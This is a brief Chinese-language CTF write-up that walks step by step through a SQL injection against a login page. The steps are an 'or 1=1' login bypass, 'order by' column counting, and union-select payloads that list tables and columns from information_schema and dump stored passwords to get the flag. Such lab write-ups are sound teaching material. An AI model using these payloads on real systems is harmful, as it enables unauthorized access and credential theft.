首先尝试万能密码:
密码随意填
登陆成功,进行get传参。
测试是否有注入点 :?username=1' order by 1#&password=admin
用户名密码错误
order by 4报错,判断有三个字段,寻找注入点:?username=1' union select 1,2,3#&password=admin
开始爆,库,表,列,字段
总结:
username=1&password=admin //显示 NO,Wrong username password!!!
username=1'&password=admin //报错
username=1'#&password=admin //显示 NO,Wrong username password!!!
username=1' or 1=1#&password=admin //显示 Login Success!Hello admin!Your password is 'xxx'
开始尝试order by猜字段数
username=1' order by 4#&password=admin//显示 Unknown column '4' in 'order clause'
username=1' order by 3#&password=admin //显示 NO,Wrong username password,说明有3个字段
开始爆库、爆表、爆列、爆字段
username=1' union select 1,2,3#&password=admin //显示 Hello 2!Your password is '3',这里表明有2,3两个回显位
username=1' union select 1,database(),3#&password=admin //得到库名“geek”
username=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#&password=admin//得到表名“geekuser,l0ve1ysq1”
username=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='l0ve1ysq1'#&password=admin//得到列名“id,username,password”
username=1' union select 1,group_concat(password),3 from l0ve1ysq1#&password=admin //得到flag